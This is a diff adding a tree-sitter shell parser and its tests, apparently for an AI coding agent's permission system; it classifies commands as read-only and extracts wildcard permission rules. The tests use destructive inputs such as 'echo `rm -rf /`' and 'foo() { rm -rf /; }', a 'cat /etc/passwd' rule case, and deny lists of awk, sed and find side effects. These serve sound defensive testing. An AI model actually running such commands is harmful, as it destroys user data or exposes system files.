expect( + await isShellCommandReadOnlyAST('awk \'{print | "sort"}\' input.txt'), + ).toBe(false); + }); + + it('rejects awk with getline from commands', async () => { + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {getline < "date"}\''), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {"date" | getline}\''), + ).toBe(false); + }); + + it('rejects awk with close() calls', async () => { + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {close("file")}\''), + ).toBe(false); + }); + }); + + describe('sed command security', () => { + it('allows safe sed commands', async () => { + expect(await isShellCommandReadOnlyAST("sed 's/foo/bar/' file.txt")).toBe( + true, + ); + expect(await isShellCommandReadOnlyAST("sed -n '1,5p' file.txt")).toBe( + true, + ); + expect(await isShellCommandReadOnlyAST("sed '/pattern/d' file.txt")).toBe( + true, + ); + }); + + it('rejects sed with execute command', async () => { + expect( + await isShellCommandReadOnlyAST("sed 's/foo/bar/e' file.txt"), + ).toBe(false); + }); + + it('rejects sed with write command', async () => { + expect( + await isShellCommandReadOnlyAST( + "sed 's/foo/bar/w output.txt' file.txt", + ), + ).toBe(false); + }); + + it('rejects sed with read command', async () => { + expect( + await isShellCommandReadOnlyAST("sed 's/foo/bar/r input.txt' file.txt"), + ).toBe(false); + }); + + it('still rejects sed in-place editing', async () => { + expect( + await isShellCommandReadOnlyAST("sed -i 's/foo/bar/' file.txt"), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST("sed --in-place 's/foo/bar/' file.txt"), + ).toBe(false); + }); + }); + + // ======================================================================= + // Additional AST-specific edge cases + // ======================================================================= + + describe('AST-specific edge cases', () => { + it('rejects backtick command substitution', async () => { + expect(await isShellCommandReadOnlyAST('echo `rm -rf /`')).toBe(false); + }); + + it('rejects process substitution with write', async () => { + // process_substitution is conservatively handled as command_substitution + expect(await isShellCommandReadOnlyAST('diff <(ls) <(ls -a)')).toBe( + false, + ); + }); + + it('allows pure variable assignment', async () => { + expect(await isShellCommandReadOnlyAST('FOO=bar')).toBe(true); + }); + + it('allows multiple env vars before command', async () => { + expect(await isShellCommandReadOnlyAST('A=1 B=2 ls -la')).toBe(true); + }); + + it('rejects function definitions', async () => { + expect(await isShellCommandReadOnlyAST('foo() { rm -rf /; }')).toBe( + false, + ); + }); + + it('allows git diff', async () => { + expect( + await isShellCommandReadOnlyAST( + 'git diff --word-diff=color -- file.txt', + ), + ).toBe(true); + }); + + it('allows git log', async () => { + expect(await isShellCommandReadOnlyAST('git log --oneline -10')).toBe( + true, + ); + }); + + it('rejects git push', async () => { + expect(await isShellCommandReadOnlyAST('git push origin main')).toBe( + false, + ); + }); + + it('allows git --version / --help', async () => { + expect(await isShellCommandReadOnlyAST('git --version')).toBe(true); + expect(await isShellCommandReadOnlyAST('git --help')).toBe(true); + }); + + it('allows input redirection (read-only)', async () => { + expect(await isShellCommandReadOnlyAST('cat < input.txt')).toBe(true); + }); + + it('rejects append redirection', async () => { + expect(await isShellCommandReadOnlyAST('echo hello >> out.txt')).toBe( + false, + ); + }); + + it('allows here-string', async () => { + expect(await isShellCommandReadOnlyAST('cat <<< "hello"')).toBe(true); + }); + + it('rejects nested command substitution', async () => { + expect(await isShellCommandReadOnlyAST('echo $(echo $(rm foo))')).toBe( + false, + ); + }); + + it('allows complex pipeline of read-only commands', async () => { + expect( + await isShellCommandReadOnlyAST( + 'find . -name "*.ts" | grep -v node_modules | sort | head -20', + ), + ).toBe(true); + }); + + it('rejects pipeline with mutating command', async () => { + expect( + await isShellCommandReadOnlyAST('find . -name "*.ts" | xargs rm'), + ).toBe(false); + }); + + it('allows git branch (no mutating flags)', async () => { + expect(await isShellCommandReadOnlyAST('git branch')).toBe(true); + expect(await isShellCommandReadOnlyAST('git branch -a')).toBe(true); + }); + + it('rejects git branch -d', async () => { + expect(await isShellCommandReadOnlyAST('git branch -d feature')).toBe( + false, + ); + }); + + it('allows git remote (no mutating action)', async () => { + expect(await isShellCommandReadOnlyAST('git remote -v')).toBe(true); + }); + + it('rejects git remote add', async () => { + expect(await isShellCommandReadOnlyAST('git remote add origin url')).toBe( + false, + ); + }); + }); +}); + +// ========================================================================= +// extractCommandRules +// ========================================================================= + +describe('extractCommandRules', () => { + describe('simple commands', () => { + it('extracts root + known subcommand + wildcard', async () => { + expect( + await extractCommandRules('git clone https://github.com/foo/bar.git'), + ).toEqual(['git clone *']); + }); + + it('extracts npm install with wildcard', async () => { + expect(await extractCommandRules('npm install express')).toEqual([ + 'npm install *', + ]); + }); + + it('extracts npm outdated without wildcard (no extra args)', async () => { + expect(await extractCommandRules('npm outdated')).toEqual([ + 'npm outdated', + ]); + }); + + it('extracts cat with wildcard', async () => { + expect(await extractCommandRules('cat /etc/passwd')).toEqual(['cat *']); + }); + + it('extracts ls with wildcard', async () => { + expect(await extractCommandRules('ls -la /tmp')).toEqual(['ls *']); + }); + + it('extracts bare command without args', async () => { + expect(await extractCommandRules('whoami')).toEqual(['whoami']); + }); + + it('extracts unknown command with wildcard', async () => { + expect(await extractCommandRules('curl https://example.com')).toEqual([ + 'curl *', + ]); + }); + + it('extracts command with only flags', async () => { + expect(await extractCommandRules('ls -la')).toEqual(['ls *']); + }); + }); + + describe('compound commands', () => { + it('extracts rules from && compound', async () => { + expect(await extractCommandRules('git clone foo && npm install')).toEqual( + ['git clone *', 'npm install'], + ); + }); + + it('extracts rules from || compound', async () => { + expect(await extractCommandRules('git pull || git fetch origin')).toEqual( + ['git pull', 'git fetch *'], + ); + }); + + it('extracts rules from ; compound', async () => { + expect(await extractCommandRules('ls ; cat file')).toEqual([ + 'ls', + 'cat *', + ]); + }); + + it('extracts rules from pipeline', async () => { + expect(await extractCommandRules('cat file | grep pattern')).toEqual([ + 'cat *', + 'grep *', + ]); + }); + + it('deduplicates rules', async () => { + expect( + await extractCommandRules('npm install foo && npm install bar'), + ).toEqual(['npm install *']); + }); + }); + + describe('docker multi-level subcommands', () => { + it('extracts docker compose up with args', async () => { + expect(await extractCommandRules('docker compose up -d')).toEqual([ + 'docker compose up *', + ]); + }); + + it('extracts docker compose up without args', async () => { + expect(await extractCommandRules('docker compose up')).toEqual([ + 'docker compose up', + ]); + }); + + it('extracts docker run with wildcard', async () => { + expect(await extractCommandRules('docker run -it ubuntu bash')).toEqual([ + 'docker run *', + ]); + }); + }); + + describe('edge cases', () => { + it('returns empty for empty string', async () => { + expect(await extractCommandRules('')).toEqual([]); + }); + + it('returns empty for whitespace', async () => { + expect(await extractCommandRules(' ')).toEqual([]); + }); + + it('handles env var prefix', async () => { + expect(await extractCommandRules('FOO=bar npm install')).toEqual([ + 'npm install', + ]); + }); + + it('handles redirected command', async () => { + expect(await extractCommandRules('echo hello > out.txt')).toEqual([ + 'echo *', + ]); + }); + + it('handles pure variable assignment (no rule)', async () => { + expect(await extractCommandRules('FOO=bar')).toEqual([]); + }); + + it('extracts cargo subcommands', async () => { + expect(await extractCommandRules('cargo build --release')).toEqual([ + 'cargo build *', + ]); + }); + + it('extracts kubectl subcommands', async () => { + expect(await extractCommandRules('kubectl get pods -n default')).toEqual([ + 'kubectl get *', + ]); + }); + + it('extracts pip install', async () => { + expect(await extractCommandRules('pip install requests')).toEqual([ + 'pip install *', + ]); + }); + + it('extracts pnpm subcommands', async () => { + expect(await extractCommandRules('pnpm add -D typescript')).toEqual([ + 'pnpm add *', + ]); + }); + }); +}); diff --git a/packages/core/src/utils/shellAstParser.ts b/packages/core/src/utils/shellAstParser.ts new file mode 100644 index 000000000..7b5e5d2b2 --- /dev/null +++ b/packages/core/src/utils/shellAstParser.ts @@ -0,0 +1,1086 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * Shell AST Parser — powered by web-tree-sitter + tree-sitter-bash. + * + * Provides: + * 1. `initParser()` – lazy singleton Parser initialisation + * 2. `parseShellCommand()` – parse a command string into a tree-sitter Tree + * 3. `isShellCommandReadOnlyAST()` – AST-based read-only command detection + * 4. `extractCommandRules()` – extract minimum-scope wildcard permission rules + */ + +import Parser from 'web-tree-sitter'; +import path from 'node:path'; +import { fileURLToPath } from 'node:url'; + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +const __filename_ = fileURLToPath(import.meta.url); +const __dirname_ = path.dirname(__filename_); + +/** + * Root commands considered read-only by default (no sub-command analysis needed + * unless explicitly listed in COMMANDS_WITH_SUBCOMMANDS). + */ +const READ_ONLY_ROOT_COMMANDS = new Set([ + 'awk', + 'basename', + 'cat', + 'cd', + 'column', + 'cut', + 'df', + 'dirname', + 'du', + 'echo', + 'env', + 'find', + 'git', + 'grep', + 'head', + 'less', + 'ls', + 'more', + 'printenv', + 'printf', + 'ps', + 'pwd', + 'rg', + 'ripgrep', + 'sed', + 'sort', + 'stat', + 'tail', + 'tree', + 'uniq', + 'wc', + 'which', + 'where', + 'whoami', +]); + +/** Git sub-commands considered read-only. */ +const READ_ONLY_GIT_SUBCOMMANDS = new Set([ + 'blame', + 'branch', + 'cat-file', + 'diff', + 'grep', + 'log', + 'ls-files', + 'remote', + 'rev-parse', + 'show', + 'status', + 'describe', +]); + +/** git remote actions that mutate state. */ +const BLOCKED_GIT_REMOTE_ACTIONS = new Set([ + 'add', + 'remove', + 'rename', + 'set-url', + 'prune', + 'update', +]); + +/** git branch flags that mutate state. */ +const BLOCKED_GIT_BRANCH_FLAGS = new Set([ + '-d', + '-D', + '--delete', + '--move', + '-m', +]); + +/** find flags that have side-effects. */ +const BLOCKED_FIND_FLAGS = new Set([ + '-delete', + '-exec', + '-execdir', + '-ok', + '-okdir', +]); + +const BLOCKED_FIND_PREFIXES = ['-fprint', '-fprintf']; + +/** sed flags that cause in-place editing. */ +const BLOCKED_SED_PREFIXES = ['-i']; + +/** AWK side-effect patterns that can execute commands or write files. */ +const AWK_SIDE_EFFECT_PATTERNS = [ + /system\s*\(/, + /print\s+[^>|]*>\s*"[^"]*"/, + /printf\s+[^>|]*>\s*"[^"]*"/, + /print\s+[^>|]*>>\s*"[^"]*"/, + /printf\s+[^>|]*>>\s*"[^"]*"/, + /print\s+[^|]*\|\s*"[^"]*"/, + /printf\s+[^|]*\|\s*"[^"]*"/, + /getline\s*<\s*"[^"]*"/, + /"[^"]*"\s*\|\s*getline/, + /close\s*\(/, +]; + +/** SED side-effect patterns. */ +const SED_SIDE_EFFECT_PATTERNS = [ + /[^\\]e\s/, + /^e\s/, + /[^\\]w\s/, + /^w\s/, + /[^\\]r\s/, + /^r\s/, +]; + +/** + * Write-redirection operators in file_redirect nodes. + * Input-only redirections (`<`, `<<`, `<<<`) are safe. + */ +const WRITE_REDIRECT_OPERATORS = new Set(['>', '>>', '&>', '&>>', '>|']); + +/** + * Map of root command → known sub-command sets. + * Used by `extractCommandRules()` to identify sub-commands vs arguments. + */ +const KNOWN_SUBCOMMANDS: Record> = { + git: new Set([ + 'add', + 'am', + 'archive', + 'bisect', + 'blame', + 'branch', + 'bundle', + 'cat-file', + 'checkout', + 'cherry-pick', + 'clean', + 'clone', + 'commit', + 'config', + 'describe', + 'diff', + 'fetch', + 'format-patch', + 'gc', + 'grep', + 'init', + 'log', + 'ls-files', + 'ls-remote', + 'merge', + 'mv', + 'notes', + 'pull', + 'push', + 'range-diff', + 'rebase', + 'reflog', + 'remote', + 'reset', + 'restore', + 'revert', + 'rev-parse', + 'rm', + 'shortlog', + 'show', + 'stash', + 'status', + 'submodule', + 'switch', + 'tag', + 'worktree', + ]), + npm: new Set([ + 'access', + 'adduser', + 'audit', + 'bugs', + 'cache', + 'ci', + 'completion', + 'config', + 'create', + 'dedupe', + 'deprecate', + 'diff', + 'dist-tag', + 'docs', + 'doctor', + 'edit', + 'exec', + 'explain', + 'explore', + 'find-dupes', + 'fund', + 'help', + 'hook', + 'init', + 'install', + 'install-ci-test', + 'install-test', + 'link', + 'login', + 'logout', + 'ls', + 'org', + 'outdated', + 'owner', + 'pack', + 'ping', + 'pkg', + 'prefix', + 'profile', + 'prune', + 'publish', + 'query', + 'rebuild', + 'repo', + 'restart', + 'root', + 'run', + 'run-script', + 'search', + 'set-script', + 'shrinkwrap', + 'star', + 'stars', + 'start', + 'stop', + 'team', + 'test', + 'token', + 'uninstall', + 'unpublish', + 'unstar', + 'update', + 'version', + 'view', + 'whoami', + ]), + yarn: new Set([ + 'add', + 'autoclean', + 'bin', + 'cache', + 'check', + 'config', + 'create', + 'generate-lock-entry', + 'global', + 'help', + 'import', + 'info', + 'init', + 'install', + 'licenses', + 'link', + 'list', + 'login', + 'logout', + 'outdated', + 'owner', + 'pack', + 'policies', + 'publish', + 'remove', + 'run', + 'tag', + 'team', + 'test', + 'unlink', + 'unplug', + 'upgrade', + 'upgrade-interactive', + 'version', + 'versions', + 'why', + 'workspace', + 'workspaces', + ]), + pnpm: new Set([ + 'add', + 'audit', + 'create', + 'dedupe', + 'deploy', + 'dlx', + 'env', + 'exec', + 'fetch', + 'import', + 'init', + 'install', + 'install-test', + 'licenses', + 'link', + 'list', + 'ls', + 'outdated', + 'pack', + 'patch', + 'patch-commit', + 'prune', + 'publish', + 'rebuild', + 'remove', + 'root', + 'run', + 'server', + 'setup', + 'store', + 'test', + 'uninstall', + 'unlink', + 'update', + 'why', + ]), + docker: new Set([ + 'attach', + 'build', + 'commit', + 'compose', + 'container', + 'context', + 'cp', + 'create', + 'diff', + 'events', + 'exec', + 'export', + 'history', + 'image', + 'images', + 'import', + 'info', + 'inspect', + 'kill', + 'load', + 'login', + 'logout', + 'logs', + 'manifest', + 'network', + 'node', + 'pause', + 'plugin', + 'port', + 'ps', + 'pull', + 'push', + 'rename', + 'restart', + 'rm', + 'rmi', + 'run', + 'save', + 'search', + 'secret', + 'service', + 'stack', + 'start', + 'stats', + 'stop', + 'swarm', + 'system', + 'tag', + 'top', + 'trust', + 'unpause', + 'update', + 'version', + 'volume', + 'wait', + ]), + pip: new Set([ + 'install', + 'download', + 'uninstall', + 'freeze', + 'inspect', + 'list', + 'show', + 'check', + 'config', + 'search', + 'cache', + 'index', + 'wheel', + 'hash', + 'completion', + 'debug', + 'help', + ]), + pip3: new Set([ + 'install', + 'download', + 'uninstall', + 'freeze', + 'inspect', + 'list', + 'show', + 'check', + 'config', + 'search', + 'cache', + 'index', + 'wheel', + 'hash', + 'completion', + 'debug', + 'help', + ]), + cargo: new Set([ + 'add', + 'bench', + 'build', + 'check', + 'clean', + 'clippy', + 'doc', + 'fetch', + 'fix', + 'fmt', + 'generate-lockfile', + 'init', + 'install', + 'locate-project', + 'login', + 'metadata', + 'new', + 'owner', + 'package', + 'pkgid', + 'publish', + 'read-manifest', + 'remove', + 'report', + 'run', + 'rustc', + 'rustdoc', + 'search', + 'test', + 'tree', + 'uninstall', + 'update', + 'vendor', + 'verify-project', + 'version', + 'yank', + ]), + kubectl: new Set([ + 'annotate', + 'api-resources', + 'api-versions', + 'apply', + 'attach', + 'auth', + 'autoscale', + 'certificate', + 'cluster-info', + 'completion', + 'config', + 'cordon', + 'cp', + 'create', + 'debug', + 'delete', + 'describe', + 'diff', + 'drain', + 'edit', + 'events', + 'exec', + 'explain', + 'expose', + 'get', + 'kustomize', + 'label', + 'logs', + 'patch', + 'plugin', + 'port-forward', + 'proxy', + 'replace', + 'rollout', + 'run', + 'scale', + 'set', + 'taint', + 'top', + 'uncordon', + 'version', + 'wait', + ]), + make: new Set([]), // make targets are positional, not subcommands +}; + +/** Docker multi-level sub-command support (e.g., `docker compose up`). */ +const DOCKER_COMPOSE_SUBCOMMANDS = new Set([ + 'build', + 'config', + 'cp', + 'create', + 'down', + 'events', + 'exec', + 'images', + 'kill', + 'logs', + 'ls', + 'pause', + 'port', + 'ps', + 'pull', + 'push', + 'restart', + 'rm', + 'run', + 'start', + 'stop', + 'top', + 'unpause', + 'up', + 'version', + 'wait', + 'watch', +]); + +// --------------------------------------------------------------------------- +// Parser Singleton +// --------------------------------------------------------------------------- + +let parserInstance: Parser | null = null; +let bashLanguage: Parser.Language | null = null; +let initPromise: Promise | null = null; + +/** + * Resolve the path to a WASM file inside vendor/tree-sitter/. + * Handles three deployment scenarios: + * - Source (src/utils/*.ts): 2 levels up to package root + * - Transpiled (dist/src/utils/*.js): 3 levels up + * - Bundle (dist/cli.js): vendor at same level (0 levels) + */ +function resolveWasmPath(filename: string): string { + const inSrcUtils = __filename_.includes(path.join('src', 'utils')); + const levelsUp = !inSrcUtils ? 0 : __filename_.endsWith('.ts') ? 2 : 3; + return path.join( + __dirname_, + ...Array(levelsUp).fill('..'), + 'vendor', + 'tree-sitter', + filename, + ); +} + +/** + * Initialise the tree-sitter Parser singleton. + * Safe to call multiple times – only the first call does real work. + */ +export async function initParser(): Promise { + if (parserInstance) return; + if (initPromise) return initPromise; + + initPromise = (async () => { + const treeSitterWasm = resolveWasmPath('tree-sitter.wasm'); + await Parser.init({ + locateFile: () => treeSitterWasm, + }); + parserInstance = new Parser(); + bashLanguage = await Parser.Language.load( + resolveWasmPath('tree-sitter-bash.wasm'), + ); + parserInstance.setLanguage(bashLanguage); + })(); + + return initPromise; +} + +/** + * Parse a shell command string into a tree-sitter Tree. + * Initialises the parser lazily if needed. + */ +export async function parseShellCommand(command: string): Promise { + await initParser(); + return parserInstance!.parse(command); +} + +// --------------------------------------------------------------------------- +// AST Helpers +// --------------------------------------------------------------------------- + +type SyntaxNode = Parser.SyntaxNode; + +/** Collect all descendant nodes of given types. */ +function collectDescendants( + node: SyntaxNode, + types: Set, +): SyntaxNode[] { + const result: SyntaxNode[] = []; + const stack: SyntaxNode[] = [node]; + while (stack.length > 0) { + const current = stack.pop()!; + if (types.has(current.type)) { + result.push(current); + } + for (let i = current.childCount - 1; i >= 0; i--) { + stack.push(current.child(i)!); + } + } + return result; +} + +/** Check if a tree contains any command_substitution or process_substitution node. */ +function containsCommandSubstitutionAST(node: SyntaxNode): boolean { + return ( + collectDescendants( + node, + new Set(['command_substitution', 'process_substitution']), + ).length > 0 + ); +} + +/** Check if a redirected_statement contains a write-redirection. */ +function hasWriteRedirection(node: SyntaxNode): boolean { + if (node.type !== 'redirected_statement') return false; + for (let i = 0; i < node.childCount; i++) { + const child = node.child(i)!; + if (child.type === 'file_redirect') { + // The operator is the first non-descriptor child + for (let j = 0; j < child.childCount; j++) { + const op = child.child(j)!; + if (op.type === 'file_descriptor') continue; + // operator token + if (WRITE_REDIRECT_OPERATORS.has(op.type)) return true; + break; // only check the operator position + } + } + } + return false; +} + +/** + * Extract the command_name text from a `command` node. + * Handles leading variable_assignment(s) gracefully. + */ +function getCommandName(commandNode: SyntaxNode): string | null { + const nameNode = commandNode.childForFieldName('name'); + if (!nameNode) return null; + return nameNode.text.toLowerCase(); +} + +/** + * Argument node extraction using field name iteration. + */ +function getArgumentNodes(commandNode: SyntaxNode): SyntaxNode[] { + const args: SyntaxNode[] = []; + for (let i = 0; i < commandNode.childCount; i++) { + const fieldName = commandNode.fieldNameForChild(i); + if (fieldName === 'argument') { + args.push(commandNode.child(i)!); + } + } + return args; +} + +/** + * Strip outer quotes from a token text. + * tree-sitter preserves quotes in argument text (e.g., `'s/foo/bar/e'`), + * but for pattern matching we need the unquoted content. + */ +function stripOuterQuotes(text: string): string { + if (text.length >= 2) { + if ( + (text.startsWith("'") && text.endsWith("'")) || + (text.startsWith('"') && text.endsWith('"')) + ) { + return text.slice(1, -1); + } + } + return text; +} + +// --------------------------------------------------------------------------- +// Read-Only Analysis (per-command) +// --------------------------------------------------------------------------- + +/** + * Evaluate whether a single `command` node (simple command) is read-only. + */ +function evaluateCommandReadOnly(commandNode: SyntaxNode): boolean { + const root = getCommandName(commandNode); + if (!root) return true; // pure variable assignment + const argNodes = getArgumentNodes(commandNode); + const argTexts = argNodes.map((n) => stripOuterQuotes(n.text)); + + if (!READ_ONLY_ROOT_COMMANDS.has(root)) return false; + + // Command-specific analysis + if (root === 'git') return evaluateGitReadOnly(argTexts); + if (root === 'find') return evaluateFindReadOnly(argTexts); + if (root === 'sed') return evaluateSedReadOnly(argTexts); + if (root === 'awk') return evaluateAwkReadOnly(argTexts); + + return true; +} + +function evaluateGitReadOnly(args: string[]): boolean { + // Skip global flags to find subcommand + let idx = 0; + while (idx < args.length && args[idx]!.startsWith('-')) { + const flag = args[idx]!.toLowerCase(); + if (flag === '--version' || flag === '--help') return true; + idx++; + } + if (idx >= args.length) return true; // `git` with only flags + + const subcommand = args[idx]!.toLowerCase(); + if (!READ_ONLY_GIT_SUBCOMMANDS.has(subcommand)) return false; + + const rest = args.slice(idx + 1); + if (subcommand === 'remote') { + return !rest.some((a) => BLOCKED_GIT_REMOTE_ACTIONS.has(a.toLowerCase())); + } + if (subcommand === 'branch') { + return !rest.some((a) => BLOCKED_GIT_BRANCH_FLAGS.has(a)); + } + return true; +} + +function evaluateFindReadOnly(args: string[]): boolean { + for (const arg of args) { + const lower = arg.toLowerCase(); + if (BLOCKED_FIND_FLAGS.has(lower)) return false; + if (BLOCKED_FIND_PREFIXES.some((p) => lower.startsWith(p))) return false; + } + return true; +} + +function evaluateSedReadOnly(args: string[]): boolean { + for (const arg of args) { + if ( + BLOCKED_SED_PREFIXES.some((p) => arg.startsWith(p)) || + arg === '--in-place' + ) { + return false; + } + } + const scriptContent = args.join(' '); + return !SED_SIDE_EFFECT_PATTERNS.some((p) => p.test(scriptContent)); +} + +function evaluateAwkReadOnly(args: string[]): boolean { + const scriptContent = args.join(' '); + return !AWK_SIDE_EFFECT_PATTERNS.some((p) => p.test(scriptContent)); +} + +// --------------------------------------------------------------------------- +// Statement-level read-only analysis +// --------------------------------------------------------------------------- + +/** + * Recursively evaluate whether a statement AST node is read-only. + * + * Handles: command, pipeline, list, redirected_statement, subshell, + * variable_assignment, negated_command, and compound statements. + */ +function evaluateStatementReadOnly(node: SyntaxNode): boolean { + switch (node.type) { + case 'command': + // Check for command substitution anywhere inside the command + if (containsCommandSubstitutionAST(node)) return false; + return evaluateCommandReadOnly(node); + + case 'pipeline': { + // All commands in the pipeline must be read-only + for (const child of node.namedChildren) { + if (!evaluateStatementReadOnly(child)) return false; + } + return true; + } + + case 'list': { + // All commands joined by && / || must be read-only + for (const child of node.namedChildren) { + if (!evaluateStatementReadOnly(child)) return false; + } + return true; + } + + case 'redirected_statement': { + // Write redirections make it non-read-only + if (hasWriteRedirection(node)) return false; + // Evaluate the body statement + const body = node.namedChildren[0]; + return body ? evaluateStatementReadOnly(body) : true; + } + + case 'subshell': { + // Evaluate all statements inside the subshell + for (const child of node.namedChildren) { + if (!evaluateStatementReadOnly(child)) return false; + } + return true; + } + + case 'compound_statement': { + // { cmd1; cmd2; } – evaluate each inner statement + for (const child of node.namedChildren) { + if (!evaluateStatementReadOnly(child)) return false; + } + return true; + } + + case 'variable_assignment': + case 'variable_assignments': + // Pure assignments without a command – read-only (just sets env) + return true; + + case 'negated_command': { + const inner = node.namedChildren[0]; + return inner ? evaluateStatementReadOnly(inner) : true; + } + + case 'function_definition': + // Function definitions are not read-only operations per se + return false; + + case 'if_statement': + case 'while_statement': + case 'for_statement': + case 'case_statement': + case 'c_style_for_statement': + // Control flow constructs – conservatively non-read-only + return false; + + case 'declaration_command': + // export/declare/local/readonly/typeset – can modify env + return false; + + default: + // Unknown node types – conservatively non-read-only + return false; + } +} + +// --------------------------------------------------------------------------- +// Public API: isShellCommandReadOnlyAST +// --------------------------------------------------------------------------- + +/** + * AST-based check whether a shell command is read-only. + * + * Replaces the regex-based `isShellCommandReadOnly()` from shellReadOnlyChecker.ts. + * This version uses tree-sitter-bash for accurate parsing of: + * - Compound commands (&&, ||, ;, |) + * - Redirections (>, >>) + * - Command substitution ($(), ``) + * - Sub-shells, heredocs, etc. + * + * @param command - The shell command string to evaluate. + * @returns `true` if the command only performs read-only operations. + */ +export async function isShellCommandReadOnlyAST( + command: string, +): Promise { + if (typeof command !== 'string' || !command.trim()) return false; + + const tree = await parseShellCommand(command); + const root = tree.rootNode; + + // Empty program + if (root.namedChildCount === 0) return false; + + // Evaluate every top-level statement + for (const stmt of root.namedChildren) { + if (!evaluateStatementReadOnly(stmt)) { + tree.delete(); + return false; + } + } + + tree.delete(); + return true; +} + +// --------------------------------------------------------------------------- +// Public API: extractCommandRules +// --------------------------------------------------------------------------- + +/** + * Extract a simple command's root + subcommand from a `command` AST node. + * + * Returns a rule string following the minimum-scope principle: + * - root + known subcommand + `*` if there are remaining args + * - root + `*` if no known subcommand but has args + * - root only if the command has no args at all + */ +function extractRuleFromCommand(commandNode: SyntaxNode): string | null { + const rootName = getCommandName(commandNode); + if (!rootName) return null; + + const argNodes = getArgumentNodes(commandNode); + const argTexts = argNodes.map((n) => n.text); + + // Skip leading flags to find potential subcommand + let idx = 0; + while (idx < argTexts.length && argTexts[idx]!.startsWith('-')) { + idx++; + } + + const knownSubs = KNOWN_SUBCOMMANDS[rootName]; + let rule = rootName; + + if (knownSubs && knownSubs.size > 0 && idx < argTexts.length) { + const potentialSub = argTexts[idx]!.toLowerCase(); + if (knownSubs.has(potentialSub)) { + rule = `${rootName} ${argTexts[idx]!}`; + + // Docker multi-level: docker compose + if ( + rootName === 'docker' && + potentialSub === 'compose' && + idx + 1 < argTexts.length + ) { + const composeSub = argTexts[idx + 1]!.toLowerCase(); + if (DOCKER_COMPOSE_SUBCOMMANDS.has(composeSub)) { + rule = `${rootName} compose ${argTexts[idx + 1]!}`; + // Remaining args after compose sub + if (idx + 2 < argTexts.length) { + rule += ' *'; + } + return rule; + } + } + + // Remaining args after subcommand + if (idx + 1 < argTexts.length) { + rule += ' *'; + } + return rule; + } + } + + // No known subcommand – if there are any args, append * + if (argTexts.length > 0) { + rule += ' *'; + } + + return rule; +} + +/** + * Recursively extract rules from a statement node. + * Handles pipeline, list, redirected_statement, etc. + */ +function extractRulesFromStatement(node: SyntaxNode): string[] { + switch (node.type) { + case 'command': + return [extractRuleFromCommand(node)].filter(Boolean) as string[]; + + case 'pipeline': + case 'list': + case 'compound_statement': + case 'subshell': { + const rules: string[] = []; + for (const child of node.namedChildren) { + rules.push(...extractRulesFromStatement(child)); + } + return rules; + } + + case 'redirected_statement': { + const body = node.namedChildren[0]; + return body ? extractRulesFromStatement(body) : []; + } + + case 'negated_command': { + const inner = node.namedChildren[0]; + return inner ? extractRulesFromStatement(inner) : []; + } + + case 'variable_assignment': + case 'variable_assignments': + // Pure assignments – no rule needed + return []; + + default: + // For complex constructs (if/while/for/case), try to extract from + // named children conservatively + return []; + } +} + +/** + * Extract minimum-scope wildcard permission rules from a shell command. + * + * Rules follow the minimum-scope principle: + * - Preserve root command + sub-command, replace arguments with `*` + * - Compound commands are split → separate rules for each part + * - No arguments → no wildcard suffix + * + * @param command - The full shell command string. + * @returns Deduplicated list of permission rule strings. + * + * @example + * extractCommandRules('git clone https://github.com/foo/bar.git') + * // → ['git clone *'] + * + * extractCommandRules('npm install express') + * // → ['npm install *'] + * + * extractCommandRules('npm outdated') + * // → ['npm outdated'] + * + * extractCommandRules('cat /etc/passwd') + * // → ['cat *'] + * + * extractCommandRules('git clone foo && npm install') + * // → ['git clone *', 'npm install'] + * + * extractCommandRules('ls -la /tmp') + * // → ['ls *'] + * + * extractCommandRules('docker compose up -d') + * // → ['docker compose up *'] + */ +export async function extractCommandRules(command: string): Promise { + if (typeof command !== 'string' || !command.trim()) return []; + + const tree = await parseShellCommand(command); + const root = tree.rootNode; + const rules: string[] = []; + + for (const stmt of root.namedChildren) { + rules.push(...extractRulesFromStatement(stmt)); + } + + tree.delete(); + + // Deduplicate while preserving order + return [...new Set(rules)]; +} + +// --------------------------------------------------------------------------- +// Reset (for testing) +// --------------------------------------------------------------------------- + +/** + * Reset the parser singleton. Only intended for testing. + * @internal + */ +export function _resetParser(): void { + if (parserInstance) { + parserInstance.delete(); + parserInstance = null; + } + bashLanguage = null; + initPromise = null; +} diff --git a/packages/core/src/utils/shellReadOnlyChecker.ts b/packages/core/src/utils/shellReadOnlyChecker.ts index 6ab08a359..470977313 100644 --- a/packages/core/src/utils/shellReadOnlyChecker.ts +++ b/packages/core/src/utils/shellReadOnlyChecker.ts @@ -4,6 +4,12 @@ * SPDX-License-Identifier: Apache-2.0 */ +/** + * @deprecated Use `isShellCommandReadOnlyAST` from `./shellAstParser.js` instead. + * This module uses regex + shell-quote for command parsing and has known edge-case + * limitations. The AST-based replacement provides accurate parsing via tree-sitter-bash. + */ + import { parse } from 'shell-quote'; import { detectCommandSubstitution, @@ -336,6 +342,11 @@ function evaluateShellSegment(segment: string): boolean { return true; } +/** + * @deprecated Use `isShellCommandReadOnlyAST` from `./shellAstParser.js` instead. + * This function uses regex + shell-quote for command parsing with known edge-case + * limitations. The AST-based replacement provides accurate parsing via tree-sitter-bash. + */ export function isShellCommandReadOnly(command: string): boolean { if (typeof command !== 'string' || !command.trim()) { return false; diff --git a/packages/core/src/utils/summarizer.test.ts b/packages/core/src/utils/summarizer.test.ts deleted file mode 100644 index 6098e77b7..000000000 --- a/packages/core/src/utils/summarizer.test.ts +++ /dev/null @@ -1,202 +0,0 @@ -/** - * @license - * Copyright 2025 Google LLC - * SPDX-License-Identifier: Apache-2.0 - */ - -import type { Mock } from 'vitest'; -import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; -import { GeminiClient } from '../core/client.js'; -import { Config } from '../config/config.js'; -import { - summarizeToolOutput, - llmSummarizer, - defaultSummarizer, -} from './summarizer.js'; -import type { ToolResult } from '../tools/tools.js'; - -// Mock GeminiClient and Config constructor -vi.mock('../core/client.js'); -vi.mock('../config/config.js'); - -describe('summarizers', () => { - let mockGeminiClient: GeminiClient; - let MockConfig: Mock; - const abortSignal = new AbortController().signal; - - beforeEach(() => { - MockConfig = vi.mocked(Config); - const mockConfigInstance = new MockConfig( - 'test-api-key', - 'gemini-pro', - false, - '.', - 